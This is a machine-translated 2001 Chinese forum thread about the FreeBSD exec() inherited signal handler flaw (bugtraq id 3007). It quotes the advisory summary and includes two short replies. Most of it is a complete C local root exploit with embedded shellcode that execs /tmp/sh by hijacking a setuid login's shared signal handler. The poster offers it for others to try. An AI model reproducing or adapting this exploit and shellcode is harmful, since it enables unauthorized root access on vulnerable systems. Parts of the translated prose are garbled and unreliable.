

    

Blue Forest http://www.lslnet.com at 2:08 p.m. on August 16, 2006

FreeBSD exec () overflow bug!!!

From: cisdi (cisdi), Board: FreeBSD
Subject: Re: FreeBSD exec() InheritedSignalHandlerVulnerabil
Posting site: Shuimu Tsinghua BBS (Tue Jul 17 09:51:42 2001)

This is indeed a very serious bug; which most days have FreeBSD machine restarted the machine?
Please give a hand and take a look.
Test procedure:
After editing, cp to the /tmp directory; can be imported root of the #


#include <stdio.h>
#include <signal.h>
#include <unistd.h>
int vv1;

#define MYSIG SIGINT

//exec "/tmp/sh" Shellcode gotten from the internet and modified
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";
typedef (*PROG)();
extern char **environ;

int main(int ac, char **av)
{
    int pid;
    //(*(PROG)bsdshell)();
    if (!(vv1 = getenv("vv")))
    {
        setenv("vv", bsdshell, 1);
        if (!execle(av[0], "vv", NULL, environ))
        {
            perror("weird exec");
            exit(1);
        }
    }

    printf("vvfreebsd. Written by Georgi Guninski\n ");
    printf("shall jumps to %x\n", vv1);

    if (!(pid = rfork(RFPROC|RFSIGSHARE)))
    {
        printf("child=%d\n", getpid());
        // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
        // if (!execl("/usr/bin/rlogin", "rlogin", "localhost", 0))
        if (!execl("/usr/bin/login", "login", 0))
        {
            perror("exec setuid failed");
            exit(2);
        };
    }
    sleep(2);
    signal(MYSIG, (sig_t)vv1);
    sleep(2);
    kill(pid, MYSIG);
    printf("done\n");
    while (42);
}




[In the post by cybergene (Gene ~ ~ ~ perhaps beyond), it was mentioned:]
: FreeBSD exec() Inherited Signal Handler Vulnerability
: bugtraq id : 3007
: object : exec() (syscall)
: class : Design Error
: cve : CVE-MAP-NOMATCH
: remote : No
: local : Yes
: published : July 10, 2001
: updated : July 16, 2001
: vulnerable : FreeBSD FreeBSD 4.3
:              FreeBSD FreeBSD 4.2
: ...................

--

[Revised: cisdi revised this post on Jul 17 09:52:32] [FROM: 61.167.60.3]
[Source: Shuimu Tsinghua BBS smth.org] [FROM: 61.167.60.3]




Re : FreeBSD exec () overflow bug!!!

FreeBSD4.3?




Re : FreeBSD exec () overflow bug!!!

Read the code first; is this called an overflow?

Unix is a life style.


